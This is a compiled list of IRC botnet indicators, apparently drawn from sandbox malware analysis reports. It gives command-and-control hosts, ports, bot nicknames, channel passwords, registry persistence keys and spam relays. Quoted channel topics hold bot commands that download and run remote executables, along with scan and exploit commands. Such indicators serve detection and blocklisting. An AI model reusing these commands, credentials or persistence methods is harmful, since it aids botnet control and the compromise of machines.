Remote Host      Port Number
72.184.196.76    6667

NICK XP|00|USA|SP2|4653
USER jddgw 0 0 :XP|00|USA|SP2|4653
USERHOST XP|00|USA|SP2|4653
MODE XP|00|USA|SP2|4653 +x+iB
JOIN #ecko
PRIVMSG #ecko :12Password accepted12Type commandlist12[PSTORE]: Starting Pstore.12[PSTORE]: Pstore Started.
PONG :1F6819DC

Other details
* The following ports were open in the system:

Port    Protocol    Process
113     TCP         msconfig.exe (%System%\msconfig.exe)
1052    TCP         msconfig.exe (%System%\msconfig.exe)

Registry Modifications
* The following Registry Keys were created:
  o [pathname...

xdetras.dyndns.info
Host Name              IP Address
dell-d3e62f7e26        10.1.2.2
xdetras.dyndns.info    109.123.66.112

* C&C Server: 109.123.66.112:6667
* Server Password:
* Username: XP-5750
* Nickname: [DEU|00|P|03462]
* Channel: #nuevos# (Password: mariano)
* Channeltopic: :

Registry Changes by all processes
Create or Open:
Changes:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “winlogin” = winlogin.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run “winlogin” = winlogin.exe
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “c:\1.exe” = c:\1.exe:*:Enabled:winlogin
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg “Active”...

bnetnew.helohmar.com
bnetnew.helohmar.com 98.126.18.10
Outgoing connection to remote server: bnetnew.helohmar.com TCP port 8800

SMTP: 65.55.37.88:25
* SMTP: 74.6.136.65:25
* Username / Password: /
SMTP: 65.55.92.152:25
SMTP: 65.55.37.104:25
SMTP: 65.54.188.72:25
SMTP: 65.55.92.152:25
SMTP: 65.54.188.110:25
* SMTP: 209.191.88.254:25
* Username / Password: /

Registry Changes by all processes
Create or Open:
Changes:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Taskman” = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
  HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell” = explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Tjmm71” = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
Reads:
  HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon...

tx.mostafaaljaafari.net
67.43.232.36:8080
Nick: FpNYgjKTV
Username: ngyccn
Joined Channel: #rstn2
Channel Topic for Channel #rstn2: “* ipscan s.s.s dcom2 -f -s”

Other channels:

Now talking in ##xddc
Topic On: [ ##xddc ] [=t0Y0F21DYX4e6UWiqOP9ZY0vX4MOFnQpiS67nAcB1uLbI7sg33T9PIBDhDk/qm5 ]
Topic By: [ m1244 ]
Modes On: [ ##xddc ] [ +smntSMCu ]

Now talking in #xddc1
Topic On: [ #xddc1 ] [13 * download http://idfc.info/bnew.exe -e -f -s ]
Topic By:...

dong.nagitiriheiwu.net
72.10.169.26:2293
Nick: akjHdYdP
Username: tpepiy
Joined Channel: #siwa
Channel Topic for Channel #siwa: “=XRlSYWHDxodKoKTdT7BxKpedXm7GERdOTvU41sULBVo0tVz3vs9al15JIViw”

ghostnet.ghostmarket.net
Remote Host     Port Number
58.30.17.229    8080

NICK {NEW-USA-XP-SXYOQB}
USER USA “” “lol” :USA
JOIN #!Rape
PONG :ghostnet.ghostmarket.net

Other details
* The following port was open in the system:

Port    Protocol    Process
1052    TCP         File.exe (%UserProfile%\File.exe)

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Microsoft Drive Guard32 = “%UserProfile%\File.exe”
  so that File.exe runs every time Windows starts...

74.81.64.25 (email bot)
74.81.64.25 (2345)
#info [21:41] [BRA|00|D|33418]: [IM]: Thread Activated: Sending Message With Email.

drego85.dyndns.org/drego85.ns0.it/drego85.no-ip.net
Host Name             IP Address
dell-d3e62f7e26       10.1.12.2
drego85.dyndns.org    67.220.65.39

* C&C Server: 67.220.65.39:6667
* Server Password:
* Username: XP-2174
* Nickname: [00|DEU|707227]
* Channel: #imbot (Password: config)
* Channeltopic: :.dl http://ownedrox.altervista.org/imbotv4.exe c:\startme32.exe 1

net.anddos.co.uk (anddos dci bot lol)
* Requested Host: net.anddos.co.uk
* Resulting Address: 94.23.153.223
* IRC Data
  o User Name: zgtlat
  o Host Name: “”
  o Server Name:
  o Real Name: zgtlat
  o Password: dickybob
  o Nick Name: ncrrpk
  o Non RFC Conform: 1
    + Channel
      # Name: #ohai3
      # Password: trb123trb
    + Notice Message Deleted
      # Value: :irc.goonet.net NOTICE AUTH :***...

sip4.voipkosovasite.com
DNS Lookup
Host Name IP Address
0 127.0.0.1
shitit.net shitit.net 75.126.252.200

UDP Connections
Remote IP Address: 127.0.0.1 Port: 1045
Send Datagram: 53 packet(s) of size 1
Recv Datagram: 53 packet(s) of size 1

Download URLs
http://75.126.252.200/fly3.jpg (shitit.net)
Outgoing connection to remote server: shitit.net TCP port 80

DNS Lookup
Host Name                  IP Address
dell-d3e62f7e26            10.1.10.2
sip4.voipkosovasite.com    82.114.87.46

* C&C Server: 82.114.87.46:1868
* Server Password:
* Username: XP-9971
* Nickname: [00|DEU|994663]...